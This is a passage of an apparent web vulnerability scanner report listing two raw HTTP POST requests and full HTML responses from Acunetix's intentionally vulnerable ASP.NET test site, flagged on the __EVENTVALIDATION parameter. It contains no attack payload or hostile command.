style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8339&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAndrSutoIZGRk4sH7RXgLdfh1FxeeA927dpHR%2Fcc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKAs7amDgLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAy7wSkzPRGV0lRfBDDkvvz8oNEAk
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:57 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgCAndrSutoIZGRk4sH7RXgLdfh1FxeeA927dpHR/cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKAs7amDgLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAy7wSkzPRGV0lRfBDDkvvz8oNEAk" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:White" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8126&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAoJByE9oIZGRk3S%2B8XajATKfc9sHGK1Gh780GR2Q%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKAweRZAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMHrGR%2Fl%2BNozFIwFevO8RrulTQFCo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:53:42 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAoJByE9oIZGRk3S+8XajATKfc9sHGK1Gh780GR2Q=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKAweRZAqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMHrGR/l+NozFIwFevO8RrulTQFCo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:White" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 